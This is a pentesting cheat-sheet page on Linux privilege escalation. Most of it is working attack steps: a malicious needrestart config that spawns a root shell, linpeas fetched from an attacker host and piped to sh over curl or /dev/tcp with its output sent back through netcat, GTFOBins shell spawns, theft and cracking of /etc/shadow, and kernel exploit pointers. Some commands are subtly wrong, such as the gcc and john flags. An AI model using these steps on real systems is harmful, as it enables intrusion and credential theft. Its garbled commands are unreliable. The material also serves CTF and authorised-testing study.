Privilege escalation

After exploitation - interesting cmd's

#check user privs
sudo -l

# Check installed FTP version
apt list --installed | grep ftp

# Check for locally open ports
netstat -antp | grep -i list

# Get SSH version on Linux
ssh -v localhost

# Get FTP daemon package version on Linux
dpkg -l pure-ftpd

# View OS related info
uname -a
lsb_release -a

Privilege Escalation — CVE-2024–48990 / CVE-2024–48991 (needrestart)

Create a malicious config:

mkdir -p /tmp/.needrestart
cat > /tmp/.needrestart/needrestart.conf <<EOF
$nrconf{ui} = 'NeedRestart::UI::stdio';
system("/bin/bash");
EOF

Execute needrestart with custom config:

sudo needrestart -c /tmp/.needrestart/needrestart.conf

Linpeass

Using tools like linpeas.sh automates the enumeration process, making it more efficient and comprehensive.

Download LinPeass rom github

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

Transfer Linpeas to the victims machine

# Local network 
sudo python3 -m http.server 80 #Host 
curl 10.10.10.10/linpeas.sh | sh #Victim 

# Without curl 
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host 
cat < /dev/tcp/10.10.10.10/80 | sh #Victim

Execute from memory and send output back to the host

nc -lvnp 9002 | tee linpeas.out #Host 
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim

Analyze the Red findings

Go to GTFOBins

GTFOBinsgtfobins.github.io

Type program that is a SUID and try things out, for example python sudo:

python -c 'import os; os.system("/bin/sh")'

CVE-2021-3493 - Ubuntu kernel priv escalation

Affected versions

Ubuntu 20.10

Ubuntu 20.04 LTS

Ubuntu 19.04

Ubuntu 18.04 LTS

Ubuntu 16.04 LTS

Ubuntu 14.04 ESM

If the target is one of the ubuntu version above, it will be affected by the Overlays privilege escalation vulnerability from which you can use the exploit below:

GitHub - briskets/CVE-2021-3493: Ubuntu OverlayFS Local PrivescGitHub

You have to complie the tool first with:

gcc -o exploit -c exploit.c

Shadow File

Copy /etc/passwd
Copy /etc/shadow
Merge the files with unshadow tool

unshadow <passwdFile> <shadowFile> > <outputFileName>

Crack the passwords offline with John

john --worldlist=<wordlistFile> <UnshadowFile>

DirtyCowl - 2016-5195

GitHub - gbonacini/CVE-2016-5195: A CVE-2016-5195 exploit example.GitHub

Check all executables that we can execute as sudo:

find / -perm 4000 2>/dev/null

Once identified, try one of them, check the Gtfobins resource for available exploits

https://gtfobins.github.io/gtfobins/gtfobins.github.io

Check the sudo privileges we might have as current user:

sudo -l

If we can execute a binary with root privileges, we can check on gtfonbins how we can get root access through that executable

Check the crontabs

If we can find a executable script where we can right, we might use it in order to add all users to /etc/sudoers

PreviousUsefull command's NextWindows useful commands

Last updated 1 month ago

hashtagAfter exploitation - interesting cmd's

hashtagPrivilege Escalation — CVE-2024–48990 / CVE-2024–48991 (needrestart)

hashtagLinpeass

hashtagTransfer Linpeas to the victims machine

hashtagExecute from memory and send output back to the host

hashtagCVE-2021-3493 - Ubuntu kernel priv escalation

hashtagAffected versions

hashtagShadow File

hashtagDirtyCowl - 2016-5195

hashtag Check all executables that we can execute as sudo:

hashtagCheck the sudo privileges we might have as current user:

hashtagCheck the crontabs

After exploitation - interesting cmd's